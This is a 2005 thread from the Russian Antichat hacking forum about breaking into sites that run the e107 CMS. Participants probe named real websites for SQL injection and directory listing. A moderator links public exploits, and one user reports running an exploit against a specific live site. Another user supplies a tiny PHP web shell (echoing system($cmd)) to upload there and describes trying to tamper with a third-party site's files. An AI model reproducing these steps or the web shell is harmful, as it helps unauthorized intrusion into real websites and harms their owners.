ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

движок от http://www.e107.ru/
  #1  
Старый 09.10.2005, 16:20
Аватар для Tikson
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
Question движок от http://www.e107.ru/

Хотелеось бы ипытать его на прочность
я конечно приметил уже пару сайтов(2 как минимум) на которых стоит этот движок и я так же хочу скаать вам что он очень популярен...
первое что я конечно сделел это испытание на скьюл иньекцию... не пошло пишет акцес дениед, но зато можно просматривать почти все директории :
e107_admin,e107_docs,e107_files,e107_handlers,e107 _images,e107_languages,e107_plugins,e107_themes
но в них я не нашол чего-нибуть интересного.Нельзя просматривать содержимое www.sait.net/e107_config
так как есть фаил e107.htaccess который препядствует просмотру . Но все же если обратиться к сайту так http://www.sait.net/e107_plugins/aut...ой_текс то этот "любой_текст" будет напечатан но это не дает ничего больше тоесть скрипт только печатает и ничего более...
и еще очень странно на мой взгляд предается значение id оно пере дается чере точку например id.1
 
Ответить с цитированием

  #2  
Старый 09.10.2005, 18:07
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Tikson, в след. раз пиши так, чтобы твой урл не был реальным сайтом..) например,
http://[example]/e107_plagins/etc..

Теперь по теме.
Вот тебе 2 эксплоита).
http://milw0rm.com/id.php?id=1106
http://milw0rm.com/id.php?id=704

Последний раз редактировалось Azazel; 04.12.2005 в 17:27..
 
Ответить с цитированием

  #3  
Старый 09.10.2005, 18:17
Аватар для Tikson
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

Rebz спасибо =)))
ps я думал уж что мне не помогут, спасибо, большой респект тебе и всему античату =)
СПАСИБО!!!
 
Ответить с цитированием

  #4  
Старый 09.10.2005, 18:58
Аватар для Tikson
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

Rebz я использовал сплоит => http://milw0rm.com/id.php?id=704
есть вопрос что значит "b4d upload!!"
я все делал как в сплоите написано
perl 1\e107.pl www.nradio.ru
1 - это папка в которой у меня лежит сплоит
и вмне значит выводится сообщение
## www.nradio.ru
## b4d upload!!

что это начит??? и как от этого танцевать????
 
Ответить с цитированием

  #5  
Старый 09.10.2005, 19:55
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

гык, если честно, то не знаю..) надо исходный код смотреть.. возможно там стоит небольшая защита.. а возможно версия e107 пропатчена..
 
Ответить с цитированием

  #6  
Старый 09.10.2005, 20:10
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Помоему та стоит закачка файла с адреса http://www.lapropinacultural.com.ar/...sert_image.php
но выдаётся какая-то ошибка....
Попробуй зафигачь свой и в файле пропиши
<?
echo "<pre>";
sysem($cmd);
echo "</pre>";
?>

Мож получится.
 
Ответить с цитированием

  #7  
Старый 09.10.2005, 20:26
Аватар для Tikson
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

это в картинке можно писать??? там вообщето нельзя фаилы закачивать
 
Ответить с цитированием

  #8  
Старый 09.10.2005, 21:12
Аватар для Kond4r
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

http://nradio-ru.mitos.ru/e107_handl...ger/images.php
картинку удалить у меня не получилось((( может дело в этом
 
Ответить с цитированием

  #9  
Старый 09.10.2005, 21:13
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Да... возможно, они на папочку upload поставили права не 777. -)
В общем, как вариант, можете на др.сайте попробовать.. если будет такая же ошибка выскакивать, значит дело в сплоите).
 
Ответить с цитированием

  #10  
Старый 09.10.2005, 21:31
Аватар для Tikson
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

Kond4r как ты зделал это?????? как залил и что????
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Движок сайта МГПИ - спёкся! n4r0$ Болталка 6 27.03.2009 11:43
Что это за движок? azeri_hacker Болталка 10 11.07.2005 18:43
Суперпупер движок [CH]P] Болталка 0 17.04.2005 23:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ